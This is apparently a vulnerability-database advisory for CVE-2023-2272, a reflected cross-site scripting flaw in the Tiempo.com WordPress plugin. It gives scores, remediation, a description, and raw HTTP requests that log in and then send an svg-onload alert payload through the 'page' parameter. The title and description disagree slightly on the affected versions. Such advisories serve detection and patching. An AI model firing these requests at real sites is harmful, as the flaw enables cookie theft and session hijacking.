🔙 목록으로 돌아가기

CVE-2023-2272: Tiempo.com <= 0.1.2 - Cross-Site Scripting

TitleTiempo.com <= 0.1.2 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationUpgrade to a patched version of Tiempo.com (version 0.1.3 or above) that addresses the XSS vulnerability.
CVSS Score6.1
EPSS Score0.18279
CVE IDCVE-2023-2272
CWE IDCWE-79
Tags cve cve2023 wpscan wp wp-plugin wordpress authenticated xss tiempocom tiempo vuln

🔍 Vulnerability Description

Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=hk3qqi&pwd=rUvgMm&wp-submit=Log+In
POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-2272.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-2272.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A